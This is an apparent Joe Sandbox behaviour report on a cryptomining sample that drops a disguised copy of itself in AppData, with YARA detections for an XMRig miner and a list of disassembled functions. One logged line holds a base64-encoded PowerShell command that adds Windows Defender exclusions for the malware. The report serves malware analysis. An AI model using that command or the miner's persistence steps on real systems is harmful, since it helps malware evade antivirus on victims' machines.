2024-12-12 21:44:28 UTC	435	IN	Data Raw: 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e Data Ascii: pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span

Target ID:	0
Start time:	16:39:57
Start date:	12/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x1fb8bee0000
File size:	5'879'808 bytes
MD5 hash:	60BC4894D78BA3F2EF9AA66486AAD79E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2912880514.000001FBA74F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2156184931.000001FB8E176000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:40:03
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:40:03
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:40:06
Start date:	12/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:40:08
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:40:08
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:40:09
Start date:	12/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
Imagebase:	0x7ff63dd00000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:40:09
Start date:	12/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	16:40:10
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Roaming\WindosCPUsystem.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\WindosCPUsystem.exe
Imagebase:	0x20a5d2d0000
File size:	5'879'808 bytes
MD5 hash:	60BC4894D78BA3F2EF9AA66486AAD79E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 24%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	16:40:10
Start date:	12/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.com/
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	16:40:10
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	16:40:10
Start date:	12/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1920,i,4819257383897995677,4500115031677660423,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	16:41:16
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com"
Imagebase:	0x7ff61f580000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 5412, Parent PID: 7140

General

Target ID:	17
Start time:	16:41:17
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	16:42:07
Start date:	12/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
Imagebase:	0x7ff69af80000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FF8490E3C7F Relevance: 7.2, Strings: 5, Instructions: 987COMMON

Download Yara Rule

Strings

a8_H, xrefs: 00007FF8490E4191
8WI, xrefs: 00007FF8490E41C0
8WI, xrefs: 00007FF8490E40F5
8WI, xrefs: 00007FF8490E412E
8WI, xrefs: 00007FF8490E4187

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI$8WI$8WI$8WI$a8_H
API String ID: 0-3665848616
Opcode ID: 43dbcf7419c6205609331468a04dd2231857ea9bd8faab7af60e430fc57c7cf2
Instruction ID: f4a76c3e631d149a306a542ad62e4c6d0c8611e2ebdf40ae46852248b7e29917
Opcode Fuzzy Hash: 43dbcf7419c6205609331468a04dd2231857ea9bd8faab7af60e430fc57c7cf2
Instruction Fuzzy Hash: CC625D31A1CA4A8FEF98EF1C949567977E1FF98740F540179E44AC7296CE38EC428B81

Function 00007FF8490ED28D Relevance: 5.1, Strings: 3, Instructions: 1324COMMON

Download Yara Rule

Strings

8WI, xrefs: 00007FF8490ED911
8WI, xrefs: 00007FF8490ED7F9
8WI, xrefs: 00007FF8490ED8CD

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI$8WI$8WI
API String ID: 0-2331838877
Opcode ID: 4ada9fefc449943b81727d2e2b28aba01ba7c8ab294f3cece5518675ec2cd9ff
Instruction ID: 78b4b58c3a201f62791e711af0644c66cccf3e948c6ed29ad40f5aee6653a4cb
Opcode Fuzzy Hash: 4ada9fefc449943b81727d2e2b28aba01ba7c8ab294f3cece5518675ec2cd9ff
Instruction Fuzzy Hash: E6921731A1CA8A4FEF69AF2C94552B977E1FF94394F14067ED04AC76C6DE2CE8428740

Function 00007FF8490E000A Relevance: 4.7, Strings: 3, Instructions: 961COMMON

Download Yara Rule

Strings

8WI, xrefs: 00007FF8490E0740
8WI, xrefs: 00007FF8490E07DD
8WI, xrefs: 00007FF8490E0779

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI$8WI$8WI
API String ID: 0-2331838877
Opcode ID: de4eb65707fd8f533c1cd59b1c8eb76a9c5628a800553a742f22253f6a4f4922
Instruction ID: bea56a2be7ea95a0af8097dea03080099e0b0abe8f4fbc58ec6bed4d532c3885
Opcode Fuzzy Hash: de4eb65707fd8f533c1cd59b1c8eb76a9c5628a800553a742f22253f6a4f4922
Instruction Fuzzy Hash: 2162C131A1DA8A8FEFA9EF2C8455675B7E1FF59350F04057DC48AC3A82DE28F8418781

Function 00007FF8490E12A0 Relevance: 4.5, Strings: 3, Instructions: 792COMMON

Download Yara Rule

Strings

8WI, xrefs: 00007FF8490E1765
=_L, xrefs: 00007FF8490E1AD0
8WI, xrefs: 00007FF8490E1C2D

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: =_L$8WI$8WI
API String ID: 0-714687369
Opcode ID: d0da1cd34c53a6a76655009d7c16dfa04f493dbaee8a4a6d9df48712c29c8c1b
Instruction ID: 6da1f5ed51636c872be95a09b40b12f3968166935153a34f24b510548aefd8fa
Opcode Fuzzy Hash: d0da1cd34c53a6a76655009d7c16dfa04f493dbaee8a4a6d9df48712c29c8c1b
Instruction Fuzzy Hash: 37328B31A1EAC55FEBA5BB7C94555F97BE0EF45360B0802BAC08DCB193DE1CA8468391

Function 00007FF8490E0AD9 Relevance: 10.7, Strings: 8, Instructions: 670COMMON

Download Yara Rule

Strings

8WI, xrefs: 00007FF8490E0FB2
8WI, xrefs: 00007FF8490E0F76
8WI, xrefs: 00007FF8490E0E67
8WI, xrefs: 00007FF8490E0F5F
8WI, xrefs: 00007FF8490E0FEB
8WI, xrefs: 00007FF8490E0F08
8WI, xrefs: 00007FF8490E0E7E
8WI, xrefs: 00007FF8490E101D

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI$8WI$8WI$8WI$8WI$8WI$8WI$8WI
API String ID: 0-805088893
Opcode ID: a06c3a349261c0a673eac1a99ba4b1fd66860e64e84a9b65b57abbe075cae77f
Instruction ID: 514fd9043eab655a14d675fd6186be7418afa2ce48df46cb6e679f41fcdb8d34
Opcode Fuzzy Hash: a06c3a349261c0a673eac1a99ba4b1fd66860e64e84a9b65b57abbe075cae77f
Instruction Fuzzy Hash: A8223830A1DA865FEBA9EB2C949557977E1FF94340F1405BDD48EC3686DE2CF8028781

Function 00007FF849033001 Relevance: 9.3, Strings: 7, Instructions: 580COMMON

Download Yara Rule

Strings

xMI, xrefs: 00007FF849033336
xMI, xrefs: 00007FF84903379E
xMI, xrefs: 00007FF849033113
xMI, xrefs: 00007FF8490334EC
xMI, xrefs: 00007FF849033731
xMI, xrefs: 00007FF8490336C4
xMI, xrefs: 00007FF8490335D8

Memory Dump Source

Source File: 00000000.00000002.3280238194.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849030000_file.jbxd

Similarity

API ID:
String ID: xMI$xMI$xMI$xMI$xMI$xMI$xMI
API String ID: 0-3338215107
Opcode ID: f30f6ff284840666f090fb03ebc9eb96e014122388b781d7992b3dcb58c407df
Instruction ID: 3081cd2e6ee04324e4805941b554d498156415de50948339fbfa1be6f7d11ca5
Opcode Fuzzy Hash: f30f6ff284840666f090fb03ebc9eb96e014122388b781d7992b3dcb58c407df
Instruction Fuzzy Hash: 09129271D1CA8A9FEFB4EF2988957F977B1FF65780F9441B6C00CD7192CA28A8458740

Function 00007FF8490E5669 Relevance: 5.3, Strings: 4, Instructions: 267COMMON

Download Yara Rule

Strings

b6_H, xrefs: 00007FF8490E581E
8WI, xrefs: 00007FF8490E5857
8WI, xrefs: 00007FF8490E5801
8WI, xrefs: 00007FF8490E57C7

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI$8WI$8WI$b6_H
API String ID: 0-778071075
Opcode ID: 68b826f5c705fbd8e9e85c43407453397df6425de3a1f3664fa81a7398259b52
Instruction ID: cfdec56ff4ef3dc86a4f2b52df73f127c835df20feecaaff11afa1d65b481f16
Opcode Fuzzy Hash: 68b826f5c705fbd8e9e85c43407453397df6425de3a1f3664fa81a7398259b52
Instruction Fuzzy Hash: 7171F822E0D9DA8FEFA9AA2C64693753BD0EF55780B0404BAD08EC72D2DD1CEC468345

Function 00007FF8490E5BB0 Relevance: 4.6, Strings: 3, Instructions: 819COMMON

Download Yara Rule

Strings

8WI, xrefs: 00007FF8490E6396
8WI, xrefs: 00007FF8490E633C
8WI, xrefs: 00007FF8490E6325

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI$8WI$8WI
API String ID: 0-2331838877
Opcode ID: be303b0a8c4ed8b2c141b575786ef272e5aa8faa5b4db1bf4f91f2940f92d64a
Instruction ID: b4822354f1f9449159cbcb8b6dbe294b3ee7176712d83a764a7d9993224156b3
Opcode Fuzzy Hash: be303b0a8c4ed8b2c141b575786ef272e5aa8faa5b4db1bf4f91f2940f92d64a
Instruction Fuzzy Hash: 76427F31A1CA498FEFB9EF2CD499A6977D1FF58340B1505B9E04EC72A2DE28EC418741

Function 00007FF8490E8F86 Relevance: 4.4, Strings: 3, Instructions: 694COMMON

Download Yara Rule

Strings

8WI, xrefs: 00007FF8490E92B3
8WI, xrefs: 00007FF8490E9591
8WI, xrefs: 00007FF8490E91AD

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI$8WI$8WI
API String ID: 0-2331838877
Opcode ID: d445fa8ee703ba7bcdbc5185ca688f6baddeebff29f5f3164f70f643035ed453
Instruction ID: 7da52e765b408ca1642dbd3bb8e4c8286192aee150e095d9c0fe5ac269288d0c
Opcode Fuzzy Hash: d445fa8ee703ba7bcdbc5185ca688f6baddeebff29f5f3164f70f643035ed453
Instruction Fuzzy Hash: 4522B531A1CA894FDFA9EF2C945567977E1FF99350B0401BAD04EC7296CE2DEC428781

Function 00007FF849033162 Relevance: 3.9, Strings: 3, Instructions: 137COMMON

Download Yara Rule

Strings

xMI, xrefs: 00007FF84903379E
xMI, xrefs: 00007FF849033199
xMI, xrefs: 00007FF849033731

Memory Dump Source

Source File: 00000000.00000002.3280238194.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849030000_file.jbxd

Similarity

API ID:
String ID: xMI$xMI$xMI
API String ID: 0-4233129711
Opcode ID: fbf735c5593180f4e5696defd881657ec678ff1741f74fb2699a98388ddb4e88
Instruction ID: 44da313d32714b917737e1d20b8de6e59dd8a1ff17e6dfe63292e342d4ed9f7f
Opcode Fuzzy Hash: fbf735c5593180f4e5696defd881657ec678ff1741f74fb2699a98388ddb4e88
Instruction Fuzzy Hash: 1E410770D1CA5A9EEFB4EF59C8857B9B3A1FF69381F500176D00DA2181DB38A9818B90

Function 00007FF8490333C0 Relevance: 3.9, Strings: 3, Instructions: 108COMMON

Download Yara Rule

Strings

xMI, xrefs: 00007FF84903379E
H, xrefs: 00007FF8490333C0
xMI, xrefs: 00007FF849033406

Memory Dump Source

Source File: 00000000.00000002.3280238194.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849030000_file.jbxd

Similarity

API ID:
String ID: H$xMI$xMI
API String ID: 0-970727219
Opcode ID: ed54877315f927fab1e73ec620ece132e873a1da6357e1b62b8d541caedb6612
Instruction ID: d06a905d9054092759c94ed4f0e653063136a5b5c31025df9dc4ebf8682a70ff
Opcode Fuzzy Hash: ed54877315f927fab1e73ec620ece132e873a1da6357e1b62b8d541caedb6612
Instruction Fuzzy Hash: 87315B71E1895A9FEFB4EF588495AFD77B1FF64380F50007AC50CE3181CE28A8828B80

Function 00007FF8490E8745 Relevance: 3.2, Strings: 2, Instructions: 675COMMON

Download Yara Rule

Strings

8WI, xrefs: 00007FF8490E8914
8WI, xrefs: 00007FF8490E88DA

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI$8WI
API String ID: 0-656650510
Opcode ID: 4b209229455b538537dbf33558af27508dd59008012b02a74eac287be01b8d5a
Instruction ID: 55ee9613828005e6b5bb839e09f96984be071dfec07b71171e288aa0d2e18896
Opcode Fuzzy Hash: 4b209229455b538537dbf33558af27508dd59008012b02a74eac287be01b8d5a
Instruction Fuzzy Hash: 74224331A1C94E8FDFA9EF2CD4959A977E1FF69380B1401B9D44DC7296DE28E842C780

Function 00007FF8490ED058 Relevance: 2.8, Strings: 2, Instructions: 256COMMON

Download Yara Rule

Strings

8WI, xrefs: 00007FF8490ED214
8WI, xrefs: 00007FF8490ED1BC

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI$8WI
API String ID: 0-656650510
Opcode ID: 567e20084e7a4ae52495c7dd9a87c07eef13316a78a2c24755df16216b3e0c97
Instruction ID: 012a41eafc7f30e995180d91612f57ef77dea0b74fa7aea68482b6dab3d83465
Opcode Fuzzy Hash: 567e20084e7a4ae52495c7dd9a87c07eef13316a78a2c24755df16216b3e0c97
Instruction Fuzzy Hash: CD81F331A0DBC64FEBA5EB3C94552B5BBE0EF552A0B0805FED44DC75D2DA2CE8468341

Function 00007FF8490E8944 Relevance: 2.7, Strings: 2, Instructions: 183COMMON

Download Yara Rule

Strings

8WI, xrefs: 00007FF8490E894E
8WI, xrefs: 00007FF8490E8965

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI$8WI
API String ID: 0-656650510
Opcode ID: 9cbd8e9d3a449e54b9ffee00a8d80d38b37d22756289e50d9c8b514df3e85d86
Instruction ID: ff130ede0fb917bee3efffb7aa9233a74d26bf0311351bcafacefbb5ca8cd1ab
Opcode Fuzzy Hash: 9cbd8e9d3a449e54b9ffee00a8d80d38b37d22756289e50d9c8b514df3e85d86
Instruction Fuzzy Hash: D551A131A0C98D8FDFA5EF2CD455AA937E1FF69350B0901A9E44DC7296CA34EC41C781

Function 00007FF84903322F Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

xMI, xrefs: 00007FF84903379E
xMI, xrefs: 00007FF849033266

Memory Dump Source

Source File: 00000000.00000002.3280238194.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849030000_file.jbxd

Similarity

API ID:
String ID: xMI$xMI
API String ID: 0-2658132337
Opcode ID: c0cadf27c2586e2807fe0ef632a1100b29dad6844f10559f2b263db41a8b8978
Instruction ID: f823376db8e5a6285cd4745534959177ec85ee7d72feee5866dddd3061db18a3
Opcode Fuzzy Hash: c0cadf27c2586e2807fe0ef632a1100b29dad6844f10559f2b263db41a8b8978
Instruction Fuzzy Hash: F5311875D1854E8FDFA4EF5984856AD77B1FF64790F500176D40CE3281DA38A8828B80

Function 00007FF8490F086A Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

8WI, xrefs: 00007FF8490F0876
8WI, xrefs: 00007FF8490F08AF

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI$8WI
API String ID: 0-656650510
Opcode ID: 4ea6eb58d371c922816b64f8ceff1c3e8301c753519d7312d19ed121d018d773
Instruction ID: fe5d9fdbbddf1ca6f528fcd8247f2e96c73286779b293056a109b588a7cad4e8
Opcode Fuzzy Hash: 4ea6eb58d371c922816b64f8ceff1c3e8301c753519d7312d19ed121d018d773
Instruction Fuzzy Hash: 98212D31E1FECA8FE7B9AB38505117977E1EF64640B5404BEC18AC3AC7DE59E8068380

Function 00007FF8490E7DD6 Relevance: 2.0, Strings: 1, Instructions: 713COMMON

Download Yara Rule

Strings

8WI, xrefs: 00007FF8490E83E0

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI
API String ID: 0-2750051610
Opcode ID: 83a1816d1299f2de74521c9e4c24ba9c85d72b0952d810f4a6813b88311dd956
Instruction ID: acf4baf665b4cbd521f2c2b73fbe05984a418e2dc3f6f03190de9d2967677b6a
Opcode Fuzzy Hash: 83a1816d1299f2de74521c9e4c24ba9c85d72b0952d810f4a6813b88311dd956
Instruction Fuzzy Hash: EB327E30A1CA898FDFA9EB2C94557A977E1FF59750F1441B9D00DC7296CE28EC42CB81

Function 00007FF8490E8456 Relevance: 1.6, Strings: 1, Instructions: 371COMMON

Download Yara Rule

Strings

8WI, xrefs: 00007FF8490E83E0

Memory Dump Source

Source File: 00000000.00000002.3329963457.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490e0000_file.jbxd

Similarity

API ID:
String ID: 8WI
API String ID: 0-2750051610
Opcode ID: f62c8c365724a00f6280e57cedf82f5739db5958f2efe58861f33f841fd2129e
